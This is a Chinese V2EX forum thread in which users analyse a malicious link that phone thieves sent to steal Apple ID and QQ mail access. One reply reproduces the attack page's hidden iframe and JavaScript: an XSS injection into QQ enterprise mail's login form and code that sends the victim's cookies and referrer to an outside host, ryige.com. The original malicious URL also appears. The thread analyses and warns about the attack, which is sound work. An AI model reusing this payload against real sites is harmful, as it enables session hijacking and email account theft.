朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID

2015-11-02 13:32:21 +08:00
 saxon

http://eeee.washbowl.com.cn/
这个是个挂马地址,请各位大师分析一下
如果我点开 除了 QQ 邮箱的 Cookie 小偷还能获得什么?

8325 次点击
所在节点    问与答
38 条回复
wdlth
2015-11-02 14:57:47 +08:00
用的阿里云……
wohenyingyu01
2015-11-02 15:00:18 +08:00
网址点进去后发现是个新闻网站。。。
Evi1m0
2015-11-02 15:17:27 +08:00
@BOYPT

两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。

另外一个 iframe 是进行攻击者的操作:

<iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>

<iframe src="/htmlpage5.html" style="display:none"></iframe>

---------------

function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
});


document.domain="qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};
BOYPT
2015-11-02 15:24:43 +08:00
比较好奇的是,往 qq 的 login post 一下,然后 document.domain="qq.com";这样就能从 document.cookie 拿信息了??
skyun
2015-11-02 15:44:14 +08:00
吓得我赶紧改了 QQ 密码,清空了浏览器 cookie ,往常用网站上重新登陆了次,刷新了 cookie 。。。这样就没事了吧?
Sleebi
2015-11-02 15:47:36 +08:00
这次还好忍住了,先看评论,保命
Evi1m0
2015-11-02 15:58:08 +08:00
嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。
Smirnoff
2015-11-02 16:06:59 +08:00
@Evi1m0 蘑菇君?
yksoft1
2015-11-02 17:24:25 +08:00
用虚拟机开,发现 firefox 下 http://ryige.com/q/8 的脚本未被执行 不知怎么回事
ChoateYao
2015-11-02 17:35:11 +08:00
难道我去慢了,打开只有一个 IIS 的图标什么事情都没有发生。
saxon
2015-11-02 18:08:50 +08:00
@skyun 个人认为密码还是窃取不到的..
saxon
2015-11-02 18:14:55 +08:00
@wohenyingyu01 并不是 只是挂了一个 iframe
RHFS
2015-11-02 18:52:41 +08:00
你还是提醒一下别人别乱点链接吧。。。
我觉得很多人点玩看了评论都吓到了
curiosity
2015-11-02 19:39:18 +08:00
我擦...点开了...有什么补救方法嘛!
Evi1m0
2015-11-02 19:47:04 +08:00
saxon
2015-11-03 14:01:38 +08:00
@RHFS 提醒了
saxon
2015-11-03 14:02:10 +08:00
@curiosity 如果担心,可以改个 QQ 密码就行了
DevineRapier
2016-07-08 21:18:26 +08:00
@kikyous web 第一课: cookie 在本地, session 在服务器

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/232901

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX